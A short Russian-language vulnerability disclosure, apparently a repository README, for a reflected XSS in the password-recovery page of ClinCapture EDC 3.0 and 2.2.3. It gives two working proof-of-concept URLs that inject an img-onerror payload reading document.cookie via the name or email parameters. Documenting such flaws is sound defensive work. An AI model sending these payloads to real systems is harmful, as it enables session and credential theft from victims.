
Отражённый XSS в ClinCapture EDC
Этот репозиторий предназначен только для образовательных и оборонительных исследований в области безопасности
Отражённая межсайтовая уязвимость (XSS) в ClinCapture EDC 3.0 и 2.2.3, позволяющая неаутентифицированному удалённому злоумышленнику выполнить код JavaScript в контексте браузера жертвы.

Чтобы продемонстрировать уязвимость, необходимо перейти на вкладку восстановления пароля и указать полезную нагрузку в параметре name или email, либо отправить один запрос
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

Неаутентифицированный пользователь может выполнить код JavaScript в контексте браузера жертвы, направленный на выполнение действий от имени жертвы или кражу конфиденциальной информации, такой как ответ на секретный вопрос